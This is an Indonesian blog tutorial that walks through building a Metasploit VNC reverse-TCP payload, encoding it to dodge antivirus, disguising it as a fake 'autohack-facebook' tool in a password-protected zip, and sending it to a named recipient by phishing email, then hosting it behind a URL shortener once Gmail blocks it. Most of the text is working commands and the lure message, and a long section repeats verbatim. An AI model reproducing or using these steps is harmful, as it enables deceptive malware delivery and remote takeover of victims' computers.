Preparation
1. msfpayload
2. msfencode
3. msfconsole
4. sendEmail
Briefing
1. Membuat payload dan encoding payload
2. Menjalankan multi/handler
3. Mengirim email ke korban.
4. Gameover
Walkthrough
1. Membuat payload dan encoding payload
root@red-dragon:/# msfpayload windows/vncinject/reverse_tcp LHOST=IP address anda LPORT=port listener anda R | msfencode -e jenis encoder -t exe > /root/isi-bebas.exe
Contoh:
Pada tutorial kali ini, IP address saya 192.168.1.3, port listener saya 4444, dan saya ingin menggunakan encoder x86/shikata_ga_nai, kemudian menaruhnya di folder root dengan nama autohack-facebook.exe
root@red-dragon:/# msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.3 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/autohack-facebook.exe
2. Menjalankan multi/handler
Buka terminal, lalu ketik
root@red-dragon:/# cd /opt/framework/msf3/ && ./msfconsole
Pada konsol msf masukan perintah berikut:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST IP address anda (tahap 1)
msf exploit(handler) > set LPORT port listener anda (tahap 1)
Sesuai dengan keadaan saya pada tahap satu, maka perintah yang saya masukan adalah:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
Compress exploit kita ke dalam bentuk zip. Buka tab baru, kemudian masukan perintah:
root@red-dragon:/opt/framework/msf3# zip -e isi bebas.zip direktori exploit kita (tahap 1)
Contoh:
Saya ingin membuat zip dengan nama hacker-team.zip, sesuai dengan direktori exploit saya pada tahap 1, maka perintahnya adalah:
root@red-dragon:/opt/framework/msf3# zip -e hacker-team.zip direktori /root/autohack-facebook.exe
Masukan password untuk mengenkripsi file. Dalam tutorial kali ini, password zip saya adalah doubledragon.
3. Mengirim email ke korban
Pada postingan saya sebelumnya, saya sudah tentang mengirim email melalu terminal (jika belum membacanya kunjungi alamat ini). Kirim file zip tadi ke korban dengan bantuan attachment.
root@red-dragon:/opt/framework/msf3# sendEmail -f "Nama Samaran" -t email korban -u "Subject Email" -m "Isi email" -a directoryfile.zip -s server:port -xu username-email -xp password
Kali ini saya akan menggunakan nama samaran Attacker, mengirimnya kepada hanggara33@gmail.com, dengan subject email Mahakarya Hacker, isi pesan Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Password zip = doubledragon. Selamat membaca. Kemudian letak file zip saya berada di /opt/framwork/msf3/hacker-team.zip. Server email google adalah smtp.gmail.com, port 587. Username saya doubledragon666@gmail.com, dan password saya disensor =)
root@red-dragon:/opt/framework/msf3# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Mahakarya Hacker" -m "Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Password ZIP = doubledragon. Selamat membaca =)" -a /opt/framework/msf3/hacker-team.zip -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxxx
Daaaaan....
Ooops.. Ada yang salah. Mungkin nama file zip saya terlalu vulgar =P
Mari kita ganti.. Buka terminal kembali, lalu masukan perintah:
root@red-dragon:/opt/framework/msf3# cd
root@red-dragon:/# zip -e extract-this.zip /root/autohack-facebook.exe
Kemudian kirim email lagi dengan suber attachment yang berbeda
root@red-dragon:/# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Mahakarya Hacker" -m "Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Password ZIP = doubledragon. Selamat membaca =)" -a /root/extract-this.zip -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxxx
Persetan. Apa yang salah. Karena penasaran, saya mencoba mengunjungi link tersebut, dan menemukan bahwa google mendeteksi isi file saya sebagai virus. Jika seperti ini, rencana saya akan gagal.
Kemudian saya mencari jalan lain.
Preparation (2)
1. apache2
2. url shortener
Briefing (2)
1. Jalankan service apache2
2. Copy file extact-this.zip tadi ke directory /var/www/
3. Gunakan url shortener untuk membungkus url yang mencurigakan.
4. Gunakan url yang sudah diperpendek untuk mengelabuhi korban.
5. Korban mendownload file tersebut.
6. Game over
Walkthrough.
1. Jalankan service apache2
Buka terminal, lalu masukan perintah:
root@red-dragon:/# /etc/init.d/apache2 start
2. Copy file extact-this.zip tadi ke directory /var/www/
Buka terminal, lalu masukan perintah
root@red-dragon:/# cp /root/extract-this.zip /var/www/
3. Gunakan url shortener untuk membungkus url yang mencurigakan.
Buka browser, lalu tuju goo.gl untuk melakukan url shortening. URL yang akan kita perpendek adalah [ip address kita]/extract-this.zip. Dalam contoh ini, IP address saya 192.168.1.3. Maka URL yang akan diperpendek adalah http://192.168.1.4/extract-this.zip
4. Gunakan url yang sudah diperpendek untuk mengelabuhi korban.
Kirim email kembali dengan link tersebut, pastikan isi email terdengar menarik, agar korban terpancing untuk mendownload file tersebut. Kirim email kembali dengan bantuan sendEmail.
root@red-dragon:/opt/framework/msf3# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Mahakarya Hacker" -m "Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Download di sini = http://goo.gl/Dmzgk Password ZIP = doubledragon. Selamat membaca =)" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxx
root@red-dragon:/opt/framework/msf3# cd
root@red-dragon:/# zip -e extract-this.zip /root/autohack-facebook.exe
Kemudian kirim email lagi dengan suber attachment yang berbeda
root@red-dragon:/# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Mahakarya Hacker" -m "Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Password ZIP = doubledragon. Selamat membaca =)" -a /root/extract-this.zip -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxxx
Persetan. Apa yang salah. Karena penasaran, saya mencoba mengunjungi link tersebut, dan menemukan bahwa google mendeteksi isi file saya sebagai virus. Jika seperti ini, rencana saya akan gagal.
Kemudian saya mencari jalan lain.
Preparation (2)
1. apache2
2. url shortener
Briefing (2)
1. Jalankan service apache2
2. Copy file extact-this.zip tadi ke directory /var/www/
3. Gunakan url shortener untuk membungkus url yang mencurigakan.
4. Gunakan url yang sudah diperpendek untuk mengelabuhi korban.
5. Korban mendownload file tersebut.
6. Game over
Walkthrough.
1. Jalankan service apache2
Buka terminal, lalu masukan perintah:
root@red-dragon:/# /etc/init.d/apache2 start
2. Copy file extact-this.zip tadi ke directory /var/www/
Buka terminal, lalu masukan perintah
root@red-dragon:/# cp /root/extract-this.zip /var/www/
3. Gunakan url shortener untuk membungkus url yang mencurigakan.
Buka browser, lalu tuju goo.gl untuk melakukan url shortening. URL yang akan kita perpendek adalah [ip address kita]/extract-this.zip. Dalam contoh ini, IP address saya 192.168.1.3. Maka URL yang akan diperpendek adalah http://192.168.1.4/extract-this.zip
4. Gunakan url yang sudah diperpendek untuk mengelabuhi korban.
Kirim email kembali dengan link tersebut, pastikan isi email terdengar menarik, agar korban terpancing untuk mendownload file tersebut. Kirim email kembali dengan bantuan sendEmail.
root@red-dragon:/opt/framework/msf3# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Mahakarya Hacker" -m "Saya membuat program autohack-facebook ini untuk anda. Cukup masukan ID atau email korban, kemudian program akan mencari password email korban. Download di sini = http://goo.gl/Dmzgk Password ZIP = doubledragon. Selamat membaca =)" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxx
5. Korban mendownload file tersebut.
Mari kita lihat apa yang dilakukan korban =)
Korban: Oh my god. Saya dapat email. =0
Korban: Hmmm.. Sepertinya menarik =T Coba download aaaaaah~ Siapa tau saya bisa hack mantan pacar saya =D
[Korban mendownload fire tersebut]
[Korban mengekstrak file zip]
[Korban menjalankan file tersebut]
Korban: Coba aaaaaaaah~ =D
Korban: Kok ga terjadi apa-apa ya? =T Sial, saya kena tipu. Bodo amat. [Online lagi]
Lalu apa yang terjadi pada metasploit kita?
Layar di sebelah kanan adalah remote desktop =)
Ini adalah jalan seorang hacker, ketika ia gagal dalam metode 1, ia akan mencoba metode lain. Tidak perlu bertanya bagaimana cara mendapat metode lain, anda hanya memerlukan konsep. Kemudian meraciknya dengan logika dan pengalaman. Selamat mencoba. =)
Created by :
red-dragon
Thanks to:
[*] Metasploit
[*] Apache2
[*] sendEmail
Supported by:
blue-dragon
Loved By:
Yoshephine Handini
0 comment:
Post a Comment